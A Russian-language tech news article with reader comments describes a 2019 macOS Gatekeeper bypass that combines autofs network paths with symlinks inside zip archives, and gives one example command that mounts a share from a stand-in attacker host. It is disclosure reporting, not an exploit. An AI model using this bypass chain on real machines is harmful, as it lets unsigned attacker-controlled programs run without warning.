В macOS найдена серьезная уязвимость встроенной защиты

Артём Баусов avatar | 3
FavoriteLoading В закладки
В macOS найдена серьезная уязвимость встроенной защиты

Исследователь безопасности Филиппо Кавалларин нашел несложный способ обхода защитного инструмента Gatekeeper в macOS.

Gatekeeper проверяет наличие цифровой подписи Apple у любого приложения, загруженного не из Mac App Store. Если программа не подписана, она не запустится без прямого разрешения пользователя.

Проблема в том, что сейчас инструмент рассматривает внешние накопители и сетевые расположения как безопасные. То есть для приложений оттуда не требуется проверка подписи.

Как это работает

Для обхода защиты злоумышленнику требуется использовать:

1. Автомонтирование (autofs), которое позволяет пользователю автоматически монтировать сетевой ресурс, просто используя «специальный» путь, в данном случае любой путь, начинающийся с «/net/».

Например, «ls /net/evil-attacker.com/sharedfolder/» заставит ОС читать содержимое «sharedfolder» на удаленном хосте (evil-attacker.com).

2. Zip-архивы. Они могут содержать символические ссылки, указывающие на произвольное местоположение (включая точки автоматического монтирования). Программное обеспечение на MacOS, отвечающее за распаковку этих файлов, не выполняет никакой проверки символических ссылок перед их созданием.

Другими словами, жертва качает zip-архив, извлекает его содержимое и переходит по символической ссылке. Теперь юзер находится в месте, контролируемом злоумышленником, но которому доверяет Gatekeeper, поэтому любой контролируемый хакером исполняемый файл может быть запущен без предупреждения.

Кавалларин сообщил Apple об этой уязвимости в феврале 2019 года, но даже в macOS 10.14.15 компания её не закрыла и перестала отвечать разработчику. Поэтому он опубликовал результаты проверки в открытом доступе. [9to5]

1 Звезд2 Звезды3 Звезды4 Звезды5 Звезд (7 голосов, общий рейтинг: 4.43 из 5)
🤓 Хочешь больше? Подпишись на наш Telegramнаш Telegram.
... и не забывай читать наш Facebook и Twitter 🍒
FavoriteLoading В закладки
undefined
iPhones.ru
Виноват инструмент Gatekeeper.
Прокомментировать

🙈 Комментарии 3

  1. Hofmann026 мая 2019
    1

    «Кавалларин сообщил Apple об этой уязвимости в феврале 2019 года, но даже в macOS 10.14.15 компания её не закрыла и перестала отвечать разработчику.»
    А не бэкдор ли это?🤔

  2. ​ avatar
    26 мая 2019
    14

    Автомонтирование надо отдельно включать через консоль. Эту функцию используют разве-что в некоторых организациях и то вряд ли. А без нее фокус не работает. Обходится не защита, а предупреждение о запуске файла скачанного из интернета. Потому что информация об этом хранится в расширенных атрибутах файловой системы, которые не поддерживаются на внешних дисках и в сетевых шарах.
    Короче, как обычно, для запуска вируса под мак нужно чуть ли не самому его компилировать и настраивать окружение

  3. baraba6ka avatar
    baraba6ka26 мая 2019
    0

    Хайййп…

Вы должны авторизоваться или зарегистрироваться для комментирования.

Нашли орфографическую ошибку в новости?

Выделите ее мышью и нажмите Ctrl+Enter.

Как установить аватар в комментариях?

Ответ вот здесь